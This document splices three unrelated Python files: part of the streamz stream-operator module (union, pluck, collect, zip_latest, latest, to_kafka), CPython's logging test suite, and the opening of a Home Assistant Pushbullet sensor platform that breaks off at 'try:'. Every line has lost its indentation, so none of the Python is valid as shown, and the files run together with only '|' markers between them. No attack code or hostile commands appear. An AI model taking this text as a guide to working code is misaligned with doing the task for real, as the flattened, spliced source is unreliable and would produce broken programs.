""" Combine multiple streams into one
Every element from any of the upstreams streams will immediately flow
into the output stream. They will not be combined with elements from
other streams.
See also
--------
Stream.zip
Stream.combine_latest
"""
def __init__(self, *upstreams, **kwargs):
super(union, self).__init__(upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class pluck(Stream):
""" Select elements from elements in the stream.
Parameters
----------
pluck : object, list
The element(s) to pick from the incoming element in the stream
If an instance of list, will pick multiple elements.
Examples
--------
>>> source = Stream()
>>> source.pluck([0, 3]).sink(print)
>>> for x in [[1, 2, 3, 4], [4, 5, 6, 7], [8, 9, 10, 11]]:
... source.emit(x)
(1, 4)
(4, 7)
(8, 11)
>>> source = Stream()
>>> source.pluck('name').sink(print)
>>> for x in [{'name': 'Alice', 'x': 123}, {'name': 'Bob', 'x': 456}]:
... source.emit(x)
'Alice'
'Bob'
"""
def __init__(self, upstream, pick, **kwargs):
self.pick = pick
super(pluck, self).__init__(upstream, **kwargs)
def update(self, x, who=None, metadata=None):
if isinstance(self.pick, list):
return self._emit(tuple([x[ind] for ind in self.pick]),
metadata=metadata)
else:
return self._emit(x[self.pick], metadata=metadata)
@Stream.register_api()
class collect(Stream):
"""
Hold elements in a cache and emit them as a collection when flushed.
Examples
--------
>>> source1 = Stream()
>>> source2 = Stream()
>>> collector = collect(source1)
>>> collector.sink(print)
>>> source2.sink(collector.flush)
>>> source1.emit(1)
>>> source1.emit(2)
>>> source2.emit('anything') # flushes collector
...
[1, 2]
"""
def __init__(self, upstream, cache=None, metadata_cache=None, **kwargs):
if cache is None:
cache = deque()
self.cache = cache
if metadata_cache is None:
metadata_cache = deque()
self.metadata_cache = metadata_cache
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self.cache.append(x)
if metadata:
if isinstance(metadata, list):
self.metadata_cache.extend(metadata)
else:
self.metadata_cache.append(metadata)
def flush(self, _=None):
out = tuple(self.cache)
metadata = list(self.metadata_cache)
self._emit(out, metadata)
self._release_refs(metadata)
self.cache.clear()
self.metadata_cache.clear()
@Stream.register_api()
class zip_latest(Stream):
"""Combine multiple streams together to a stream of tuples
The stream which this is called from is lossless. All elements from
the lossless stream are emitted reguardless of when they came in.
This will emit a new tuple consisting of an element from the lossless
stream paired with the latest elements from the other streams.
Elements are only emitted when an element on the lossless stream are
received, similar to ``combine_latest`` with the ``emit_on`` flag.
See Also
--------
Stream.combine_latest
Stream.zip
"""
def __init__(self, lossless, *upstreams, **kwargs):
upstreams = (lossless,) + upstreams
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
self.lossless = lossless
self.lossless_buffer = deque()
Stream.__init__(self, upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if who is self.lossless:
self.lossless_buffer.append((x, metadata))
elif self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
self.last[idx] = x
if self.missing and who in self.missing:
self.missing.remove(who)
if not self.missing:
L = []
while self.lossless_buffer:
self.last[0], self.metadata[0] = self.lossless_buffer.popleft()
md = [m for ml in self.metadata for m in ml]
L.append(self._emit(tuple(self.last), md))
self._release_refs(self.metadata[0])
return L
@Stream.register_api()
class latest(Stream):
""" Drop held-up data and emit the latest result
This allows you to skip intermediate elements in the stream if there is
some back pressure causing a slowdown. Use this when you only care about
the latest elements, and are willing to lose older data.
This passes through values without modification otherwise.
Examples
--------
>>> source.map(f).latest().map(g) # doctest: +SKIP
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, **kwargs):
self.condition = Condition()
self.next = []
self.next_metadata = None
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
if self.next_metadata:
self._release_refs(self.next_metadata)
self._retain_refs(metadata)
self.next = [x]
self.next_metadata = metadata
self.loop.add_callback(self.condition.notify)
@gen.coroutine
def cb(self):
while True:
yield self.condition.wait()
[x] = self.next
yield self._emit(x, self.next_metadata)
@Stream.register_api()
class to_kafka(Stream):
""" Writes data in the stream to Kafka
This stream accepts a string or bytes object. Call ``flush`` to ensure all
messages are pushed. Responses from Kafka are pushed downstream.
Parameters
----------
topic : string
The topic which to write
producer_config : dict
Settings to set up the stream, see
https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration
https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md
Examples:
bootstrap.servers: Connection string (host:port) to Kafka
Examples
--------
>>> from streamz import Stream
>>> ARGS = {'bootstrap.servers': 'localhost:9092'}
>>> source = Stream()
>>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)
<to_kafka>
>>> for i in range(10):
... source.emit(i)
>>> kafka.flush()
"""
def __init__(self, upstream, topic, producer_config, **kwargs):
import confluent_kafka as ck
self.topic = topic
self.producer = ck.Producer(producer_config)
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.stopped = False
self.polltime = 0.2
self.loop.add_callback(self.poll)
self.futures = []
@gen.coroutine
def poll(self):
while not self.stopped:
# executes callbacks for any delivered data, in this thread
# if no messages were sent, nothing happens
self.producer.poll(0)
yield gen.sleep(self.polltime)
def update(self, x, who=None, metadata=None):
future = gen.Future()
self.futures.append(future)
@gen.coroutine
def _():
while True:
try:
# this runs asynchronously, in C-K's thread
self.producer.produce(self.topic, x, callback=self.cb)
return
except BufferError:
yield gen.sleep(self.polltime)
except Exception as e:
future.set_exception(e)
return
self.loop.add_callback(_)
return future
@gen.coroutine
def cb(self, err, msg):
future = self.futures.pop(0)
if msg is not None and msg.value() is not None:
future.set_result(None)
yield self._emit(msg.value())
else:
future.set_exception(err or msg.error())
def flush(self, timeout=-1):
self.producer.flush(timeout)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# This was taken from distrbuted/utils.py
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
|
test_logging.py | #!/usr/bin/env python
#
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import copy
import pickle
import io
import gc
import os
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import string
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
import textwrap
import threading
import time
import types
import unittest
import warnings
import weakref
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEquals(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEquals(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in list(my_logging_levels.items()):
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
def apply_config(self, conf):
try:
fn = tempfile.mktemp(".ini")
f = open(fn, "w")
f.write(textwrap.dedent(conf))
f.close()
logging.config.fileConfig(fn)
finally:
os.remove(fn)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEquals(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in list(self._survivors.items()):
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest)
if __name__ == "__main__":
test_main()
|
sensor.py | """Pushbullet platform for sensor component."""
import logging
import threading
from pushbullet import InvalidKeyError, Listener, PushBullet
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
SENSOR_TYPES = {
"application_name": ["Application name"],
"body": ["Body"],
"notification_id": ["Notification ID"],
"notification_tag": ["Notification tag"],
"package_name": ["Package name"],
"receiver_email": ["Receiver email"],
"sender_email": ["Sender email"],
"source_device_iden": ["Sender device ID"],
"title": ["Title"],
"type": ["Type"],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS, default=["title", "body"]): vol.All(
cv.ensure_list, vol.Length(min=1), [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Pushbullet Sensor platform."""
try:
